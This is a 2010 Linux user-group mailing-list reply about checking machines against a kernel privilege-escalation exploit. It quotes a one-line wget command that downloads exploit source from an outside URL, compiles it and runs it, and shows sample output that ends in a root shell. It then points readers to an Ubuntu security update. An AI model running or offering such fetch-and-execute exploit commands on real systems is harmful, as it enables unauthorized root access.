Re: [tlug] Linux Kernel Exploit News

[Kalin KOZHUHAROV <me.kalin@example.com>]

On Thu, Sep 23, 2010 at 18:01, CL <az.4tlug@example.com> wrote:
> On 09/23/2010 04:12 PM, Kalin KOZHUHAROV wrote:
>> Yup, that all has to be on one line:
>> wget -q http://thinrope.net/s/robert_you_suck.c -O - |gcc -x c -o r00t
>> -&&  ./r00t
>>
>> or in 3 steps:
>>
>> $ wget -q http://thinrope.net/s/robert_you_suck.c
>> $ gcc robert_you_suck.c
>> $ ./a.out
>>
>> The output (if vulnerable) is something like that:
>> resolved symbol commit_creds to 0xffffffff8104734d
>> resolved symbol prepare_kernel_cred to 0xffffffff81047248
>> mapping at 3f80000000
>> UID 0, EUID:0 GID:0, EGID:0
>> sh-4.0#
>>
>> (the last one gives you a root shell, try `dmesg -c` there for example)
>> (end with Ctrl+C, it should not crash your box)
>
> So ... my torrenting machine, running Xubuntu and running unattended
> 24/7, _is_ (gulp) got?
>
> $ resolved symbol commit_creds to 0xffffffff8108bdb0
> $ resolved symbol prepare_kernel_cred to 0xffffffff8108c190
> $ mapping at 3f80000000
> $ UID 1000, EUID:1000 GID:1000, EGID:1000
>
Hmm, it doesn't look like it, since I guess your user is has uid of
1000 and the root is (normally) uid 0. So what the exploit did is open
a shell with your user id which means you does NOT seem to be
vulnerable.

That said, it does not mean if this particular exploit doesn't work
you are not vulnerable (if it works you are vulnerable, but not vice
versa).

For ??buntu distros, this is the release:
http://www.ubuntu.com/usn/usn-988-1  so check/update yours.

Cheers,
Kalin.